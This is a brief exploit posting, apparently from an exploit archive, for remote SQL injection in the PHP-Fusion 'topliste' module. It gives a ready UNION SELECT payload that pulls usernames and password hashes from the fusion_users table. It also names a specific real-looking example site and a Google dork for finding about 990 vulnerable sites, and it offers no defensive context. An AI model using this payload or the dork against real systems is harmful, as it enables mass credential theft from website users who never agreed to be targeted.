PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
Bulan: xoron - unique
Exploit:
index.php?cid=-1//UNION//SELECT//0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20//FROM/**/fusion_users/*
Exapmle: http://www.321spil.dk/infusions/topliste/
Google Dork:
infusions/topliste/ 990 sites:)
Ekin0x / –> evilc0der.org <–